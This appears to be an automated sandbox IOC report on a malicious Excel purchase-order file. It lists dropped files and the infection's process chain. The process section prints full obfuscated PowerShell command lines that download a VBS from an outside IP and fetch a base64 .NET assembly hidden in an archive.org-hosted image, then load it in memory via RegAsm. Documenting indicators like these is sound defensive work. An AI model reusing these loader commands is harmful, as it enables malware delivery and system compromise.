IOC Report
PO_304234.xls


Files

File Path
Type
Category
Malicious
PO_304234.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 02:26:14 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetworkroundthings[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\PO_304234.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:56:44 2024, Security: 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wecreatedbuttersmoothbutterthings[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DD0935E.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B73744D0.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\04v4keoo.wzz.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\4vhnhywg.tnp.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\5dmchq4k.l3o.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES89F7.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 04:56:34 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESCDF9.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 04:56:52 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\a5lgtqgr.t5c.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ajfkpe3p.xs0.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\asv5z5h3.skq.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\cjekjvlv.cge.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\h4uk5yx3.or4.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
dropped
C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\lblvpikr.ff1.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
dropped
C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\tx55osgy.rqb.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\wv5ktyxq.nn1.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\wx0aguex.ze2.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF0756C079363CCFBF.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF50002C428033D926.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFA39F7CCAE0ED4456.TMP
data
dropped
C:\Users\user\Desktop\A7130000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:56:44 2024, Security: 1
dropped
C:\Users\user\Desktop\A7130000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? 
? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? 
?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? 
?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? 
?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?EQ? ? ? ? ?RQBS? ? ? ? ?C8? ? ? ? ?egBv? ? ? ? ?GI? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DU? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DM? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?Mw? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
